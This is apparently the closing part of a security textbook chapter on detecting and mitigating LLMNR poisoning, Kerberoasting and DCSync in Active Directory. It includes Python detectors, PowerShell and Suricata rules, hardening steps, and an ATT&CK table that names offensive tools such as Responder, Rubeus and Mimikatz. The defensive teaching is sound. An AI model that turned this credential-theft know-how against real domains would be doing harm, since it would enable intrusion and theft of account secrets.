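The Suricata rule above alerts on response volume. The stronger signal, which a threshold rule cannot express, is one host answering for many different names: a legitimate host only ever answers for its own name, while a poisoner answers for every name it hears. The following Python detector, added here as an example rather than the chapter's own code, parses LLMNR response payloads (DNS wire format, flags 0x8400 as in the rule) and alerts when a single source answers for a threshold of distinct names within a time window; the packets, addresses and names are constructed.

```python
"""LLMNR poisoning detector: one source answering for many distinct names.
Payloads are LLMNR (DNS wire format) responses, constructed here as sample input."""
import ipaddress
import struct
from collections import defaultdict

def encode_name(name: str) -> bytes:
    return b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"

def decode_name(buf: bytes, off: int):
    """Decode a DNS-style name at buf[off]; returns (name, offset after the name)."""
    labels = []
    while True:
        length = buf[off]
        off += 1
        if length == 0:
            break
        if length & 0xC0 == 0xC0:                      # compression pointer (two bytes)
            pointer = ((length & 0x3F) << 8) | buf[off]
            tail, _ = decode_name(buf, pointer)
            labels.append(tail)
            off += 1
            break
        labels.append(buf[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), off

def build_response(txid: int, name: str, ip: str) -> bytes:
    """Constructed LLMNR response: flags 0x8400, one question, one A answer (pointer to offset 12)."""
    header = struct.pack("!HHHHHH", txid, 0x8400, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)     # type A, class IN
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 30, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + answer

def parse_response(payload: bytes):
    """Return (txid, [(name, ipv4), ...]) for a response, or None for a query."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", payload[:12])
    if not flags & 0x8000:                             # QR bit clear: this is a query
        return None
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(payload, off)
        off += 4                                       # skip qtype + qclass
    answers = []
    for _ in range(ancount):
        name, off = decode_name(payload, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", payload[off:off + 10])
        off += 10
        rdata = payload[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            answers.append((name, str(ipaddress.IPv4Address(rdata))))
    return txid, answers

class LlmnrPoisonDetector:
    def __init__(self, max_names: int = 3, window: float = 60.0):
        self.max_names = max_names
        self.window = window
        self.seen = defaultdict(list)                  # src_ip -> [(timestamp, answered name)]

    def observe(self, src_ip: str, ts: float, payload: bytes) -> list:
        parsed = parse_response(payload)
        if parsed is None:
            return []
        _, answers = parsed
        alerts = []
        for name, _ in answers:
            self.seen[src_ip].append((ts, name.lower()))
            recent = {n for t, n in self.seen[src_ip] if ts - t <= self.window}
            if len(recent) >= self.max_names:
                alerts.append(f"{src_ip} answered for {len(recent)} names in {self.window:.0f}s: {sorted(recent)}")
        return alerts

def run_sample() -> list:
    """Constructed traffic: a printer answering for itself, then a poisoner answering for everything."""
    det = LlmnrPoisonDetector()
    traffic = [("192.168.1.20", 0.0, build_response(0x0001, "printer01", "192.168.1.20"))]
    for i, name in enumerate(["filesrver", "wpad", "intranet", "sharepoint"]):
        traffic.append(("192.168.1.66", 5.0 * i, build_response(0x1000 + i, name, "192.168.1.66")))
    return [alert for src, ts, payload in traffic for alert in det.observe(src, ts, payload)]
```

In production the payloads come from the UDP data of packets with source port 5355, and the threshold can stay low because no legitimate host answers for more than one or two names.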
Detecting Kerberoasting
```powershell
# Windows Event Log - Kerberoasting generates Event ID 4769
# (Kerberos Service Ticket was requested)
# Suspicious characteristics:
# - TicketEncryptionType = 0x17 (RC4-HMAC) - modern environments use AES
# - Many 4769 events from a single source in short time
# - Service accounts requested by non-service accounts
# PowerShell query for suspicious 4769 events
# 4769 EventData order: [0] TargetUserName, [1] TargetDomainName, [2] ServiceName,
# [3] ServiceSid, [4] TicketOptions, [5] TicketEncryptionType, [6] IpAddress, [7] IpPort
Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4769
    StartTime = (Get-Date).AddHours(-1)
} | Where-Object {
    $_.Properties[5].Value -eq '0x17'   # RC4 encryption
} | Select-Object TimeCreated, @{N='User';E={$_.Properties[0].Value}},
    @{N='Service';E={$_.Properties[2].Value}},
    @{N='SourceIP';E={$_.Properties[6].Value}}
```
Mitigating Kerberos Attacks
```powershell
# Enforce AES encryption - prevents RC4-based Kerberoasting (hashes harder to crack)
# GPO: Computer Configuration > Windows Settings > Security Settings >
# Account Policies > Kerberos Policy > "Configure encryption types allowed"
# Only check: AES128_HMAC_SHA1, AES256_HMAC_SHA1

# Managed Service Accounts (gMSA) - 240-char auto-rotating passwords
# Makes Kerberoasting computationally infeasible
New-ADServiceAccount -Name "svc-web" `
    -DNSHostName "svc-web.corp.local" `
    -PrincipalsAllowedToRetrieveManagedPassword "WebServers"   # Group of servers

# Enable Kerberos Pre-Authentication on all accounts (prevents AS-REP Roasting)
# In AD Users and Computers: Account tab >
# Uncheck "Do not require Kerberos preauthentication"
# Bulk fix via PowerShell:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} |
    Set-ADUser -DoesNotRequirePreAuth $false

# Protect krbtgt account (prevents Golden Ticket attacks)
# Reset krbtgt password twice (invalidates all existing tickets)
# Use Microsoft's krbtgt reset script:
# https://github.com/microsoft/New-KrbtgtKeys.ps1
.\New-KrbtgtKeys.ps1 -Mode WhatIf   # Preview impact
.\New-KrbtgtKeys.ps1 -Mode Reset    # Execute (do twice, 10 hours apart)
```
Detecting DCSync
```
# DCSync generates Event ID 4662 (An operation was performed on an object)
# with specific GUID patterns for DS-Replication-Get-Changes-All
# SIEM query - detect non-DC accounts performing DCSync
# Look for: Event 4662, ObjectType contains "domainDNS"
# AND accesses contain "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" (Replicating Directory Changes All)
# AND SubjectUserName NOT IN (list of DC machine accounts)
# Microsoft Defender for Identity (formerly ATA) detects DCSync natively

# Network-based: DCSync uses MS-DRSR RPC over port 135 + dynamic high ports
# A non-DC machine making MS-DRSR calls to port 135 on the DC is anomalous
# Suricata rule to detect (|05 00 0b| = DCE/RPC bind header; $DC_NET must be
# defined in suricata.yaml, and $HOME_NET should exclude the DCs themselves
# or the rule fires on ordinary DC-to-DC replication):
alert tcp $HOME_NET any -> $DC_NET 135 ( \
    msg:"Possible DCSync - Non-DC RPC to Domain Controller"; \
    flow:established,to_server; \
    content:"|05 00 0b|"; \
    classtype:suspicious-activity; \
    sid:9005002; rev:1; \
)
```
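The Kerberoasting and DCSync detections above can be exercised end to end without a SIEM. The following Python, added as an example and not part of the chapter, applies both rules to Security events represented as records keyed by their EventData field names (4769: TargetUserName, ServiceName, TicketEncryptionType, IpAddress; 4662: SubjectUserName, Properties). The events, account names and the DC machine-account list are constructed. Besides the Get-Changes-All right named above it also matches the companion DS-Replication-Get-Changes right (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2), which replication requests normally carry together with -All.

```python
"""Triage Windows Security events for Kerberoasting (4769) and DCSync (4662).
Records are dicts keyed by EventData field names; every event below is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
DC_ACCOUNTS = {"DC01$", "DC02$"}      # constructed: machine accounts of the real domain controllers

def detect_kerberoasting(events, window=timedelta(minutes=10), min_services=5):
    """A (user, source IP) requesting RC4 service tickets for >= min_services distinct SPNs in one window."""
    requests = defaultdict(list)
    for e in events:
        if e["Id"] == 4769 and e["TicketEncryptionType"].lower() == RC4_HMAC:
            requests[(e["TargetUserName"], e["IpAddress"])].append((e["TimeCreated"], e["ServiceName"]))
    findings = []
    for (user, ip), reqs in requests.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):          # slide the window from each request
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                findings.append(f"kerberoasting: {user} from {ip} requested RC4 tickets "
                                f"for {len(services)} services: {sorted(services)}")
                break                                  # one finding per (user, ip)
    return findings

def detect_dcsync(events, dc_accounts=DC_ACCOUNTS):
    """4662 carrying a replication control-access right from an account that is not a DC."""
    findings = []
    for e in events:
        if e["Id"] != 4662:
            continue
        # Properties is whitespace-separated; GUIDs appear in braces alongside %%-coded access names
        rights = {token.strip("{}").lower() for token in e["Properties"].split()}
        matched = [name for guid, name in REPLICATION_RIGHTS.items() if guid in rights]
        if matched and e["SubjectUserName"] not in dc_accounts:
            findings.append(f"dcsync: {e['SubjectUserName']} used {', '.join(matched)} on {e['ObjectName']}")
    return findings

def constructed_events():
    """Six RC4 SPN requests from one user in under two minutes, one normal AES request,
    legitimate DC-to-DC replication, and one replication request from a user account."""
    t0 = datetime(2024, 1, 1, 9, 0, 0)
    ev = []
    spns = ["MSSQLSvc/sql01", "http/web01", "cifs/file01", "ldap/app01", "host/backup01", "MSSQLSvc/sql02"]
    for i, spn in enumerate(spns):
        ev.append({"Id": 4769, "TimeCreated": t0 + timedelta(seconds=20 * i), "TargetUserName": "jsmith@CORP.LOCAL",
                   "ServiceName": spn, "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"})
    ev.append({"Id": 4769, "TimeCreated": t0, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs/file01",
               "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.20"})    # AES-256, normal access
    ev.append({"Id": 4662, "SubjectUserName": "DC02$", "ObjectName": "DC=corp,DC=local",
               "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"})
    ev.append({"Id": 4662, "SubjectUserName": "jsmith", "ObjectName": "DC=corp,DC=local",
               "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"})
    return ev

if __name__ == "__main__":
    for finding in detect_kerberoasting(constructed_events()) + detect_dcsync(constructed_events()):
        print(finding)
```

Real events can be exported with `Get-WinEvent ... | ConvertTo-Json` and mapped onto these field names; the DC account list is the part that must be kept accurate, since a stale list is what turns every legitimate replication into a false positive.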
10. MITRE ATT&CK Mapping
| Technique | ID | Method | Detection |
|---|---|---|---|
| LLMNR/NBT-NS Poisoning and SMB Relay | T1557.001 | Responder, ntlmrelayx | Disable LLMNR/NBT-NS, enforce signing |
| ARP Cache Poisoning | T1557.002 | arpspoof, bettercap | Dynamic ARP Inspection (DAI), static entries |
| Adversary-in-the-Middle | T1557 | MITM full attack chain | Network monitoring, HTTPS/HSTS |
| Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003 | GetUserSPNs, Rubeus | Event 4769, AES enforcement, gMSA |
| Steal or Forge Kerberos Tickets: AS-REP Roasting | T1558.004 | GetNPUsers | Enforce preauth, Event 4768 |
| Golden Ticket | T1558.001 | ticketer, Mimikatz | Detect non-DC DCSync, krbtgt rotation |
| Pass the Hash | T1550.002 | psexec, wmiexec, CME | Credential Guard, disable NTLMv1 |
| Pass the Ticket | T1550.003 | kirbi import, Rubeus | Event 4768/4769 anomalies |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | psexec, smbexec | Event 7045, monitor ADMIN$ access |
| Remote Services: Windows Remote Management | T1021.006 | evil-winrm | Restrict WinRM, enable PowerShell logging |
| OS Credential Dumping: DCSync | T1003.006 | secretsdump, Mimikatz | Event 4662, MDI alerts |
| Use Alternate Authentication Material | T1550 | PtH, PtT, Golden Ticket | Privileged Identity Management |
End of Chapter 3.3 - Man-in-the-Middle, Spoofing & Lateral Movement
Next: Chapter 3.4 - Wireless & VPN Attack Techniques